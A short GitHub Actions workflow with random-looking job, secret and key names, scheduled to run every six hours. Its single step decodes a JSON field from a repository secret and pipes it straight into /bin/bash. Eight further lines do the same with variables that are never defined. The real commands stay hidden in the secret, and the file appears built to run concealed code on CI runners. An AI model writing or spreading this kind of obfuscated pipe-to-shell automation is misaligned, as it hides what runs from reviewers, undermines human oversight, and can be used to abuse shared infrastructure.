name: fanweiti3817

on:
  workflow_dispatch:
  schedule:
    - cron: '35 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fanweiti3817
        env:
          yywd2: ${{ secrets.yywd2 }}
        run: |
          echo $yywd2 | jq -r .xlaj91177 | /bin/bash
          echo $lrlb3 | jq -r .a5276 | /bin/bash
          echo $a6709 | jq -r .youox45 | /bin/bash
          echo $yiq967 | jq -r .g4660 | /bin/bash
          echo $kci50368 | jq -r .pdp66768 | /bin/bash
          echo $u706 | jq -r .a3 | /bin/bash
          echo $aunu08 | jq -r .v11 | /bin/bash
          echo $hr43290 | jq -r .mez8 | /bin/bash
          echo $pz04 | jq -r .r1 | /bin/bash

